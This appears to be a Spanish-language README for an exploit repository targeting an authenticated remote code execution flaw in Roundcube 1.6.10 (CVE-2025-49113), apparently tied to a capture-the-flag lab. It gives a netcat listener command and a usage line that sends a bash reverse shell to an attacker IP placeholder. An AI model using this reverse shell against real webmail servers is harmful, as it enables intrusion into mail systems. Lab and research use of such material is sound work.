
Exploit de ejecución remota de código autenticado para Roundcube 1.6.10 (CVE-2025-49113). Entrega una reverse shell a través de un payload PHP manipulado mediante la interfaz de webmail.
⚠️ Aviso
Este repositorio está destinado exclusivamente para fines educativos y de investigación.
Todas las demostraciones se realizaron en un entorno de laboratorio controlado.
El uso no autorizado de pruebas o la explotación de sistemas sin permiso explícito es ilegal y poco ético. El autor no se hace responsable por el mal uso de esta información.
Roundcube es un cliente de correo electrónico IMAP basado en navegador, ampliamente utilizado y escrito en PHP. Proporciona una interfaz amigable para el acceso al correo web y es comúnmente implementado por proveedores de alojamiento, instituciones académicas y servidores de correo empresarial internos.
CVE-2025-49113 es una vulnerabilidad que afecta a Roundcube versión 1.6.10 y permite a un usuario autenticado lograr ejecución remota de código (RCE) enviando un comando manipulado a través de la interfaz de correo web.
La explotación exitosa requiere credenciales de usuario válidas. Una vez explotada, concede la ejecución de comandos a nivel de sistema según el contexto del servidor web.
http://mail.outbound.htb4444CVE-2025-49113.phpnc -nlvp 4444
php CVE-2025-49113.php {url} {usuario} {contraseña} "bash -c 'bash -i >& /dev/tcp/<TU-IP>/4444 0>&1'"
🔧 Reemplaza
<TU-IP>con la IP de tu atacante.


Consulta el análisis detallado y la teoría en mi artículo de Medium:
👉 Lee el blog en Medium